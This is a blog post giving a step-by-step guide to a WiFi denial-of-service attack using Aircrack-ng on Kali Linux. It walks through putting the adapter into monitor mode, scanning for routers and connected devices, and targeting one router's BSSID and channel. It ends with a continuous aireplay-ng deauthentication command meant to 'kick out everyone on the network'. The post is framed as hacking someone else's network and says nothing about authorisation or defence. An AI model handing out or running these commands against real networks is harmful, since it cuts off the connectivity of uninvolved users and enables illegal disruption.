Wednesday 5 December 2018

How to Execute Denial of Service Attacks on Wifi Networks

A Quick Quide To Hacking WiFi DoS attack

We will be use the Aircrack-ng suite of tools to execute a denial of service attack i.e. denying users wifi access.

Am doing this on Kali Linux, but it should also be applicable to any other GNU/Linux distro such as Parrot SEC OS. 

My wireless adapter in managed mode has the name: wlan0 and in monitor mode has the name wlan0mon. You can check for this info by running:
          iwconfig
Output of iwconfig command


1. Close down all other network services and processes:
          airmon-ng check kill
Killing networking processes

2. Set your wireless adapter card from manged mode to monitor mode to allow it to sniff and capture packets.
          airmon-ng start wlan0
Setting wireless adapter card into monitor mode

3. To see all wireless devices, wifi routers plus all users' devices such as laptops and smartphones, use the command:
          airodump-ng wlan0mon
Displaying the various devices on the network

You can add a -a element to prevent un-associated users (users not connected to a particular wifi) from being displayed.
         airodump-ng -a wlan0mon

4. Make sure to copy and save the MAC address/ BSSID of a specific wifi router.

5. To focus on a specific wifi and the users connected to it, use the command:
          airodump-ng -a --bssid (MAC ADDRESS) wlan0mon

Replace MAC ADDRESS with the BSSID of the wifi router
Then to prevent channel hoping of your wireless adapter, from channel 1 to 13, set it to focus on a specific channel, the same channel as the wifi router you intend to hack.
         airodump-ng -a -c 11 wlan0mon
Targeting a specific channel

Check the wifi router's channel in the ch column and type it just after the -c option command.

6. Now for the ultimate, final epic moment. Let's kick out everyone on the network using the command:
         aireplay-ng -0 0 -a (MAC ADDRESS) wlan0mon
Our Deauth Attack is working

This will run continuously, deauthenticating everyone on the network. The 0 option is for deauthenticating continuously and the -0 option for a deauthentication attack.

That's all for now.


No comments:

Post a Comment

Let's Talk Anonymity: A Short Treatise On Anonymity

The internet takes a very serious position in our everyday lives. We do a lot of activities over the web, some of which we would like our ...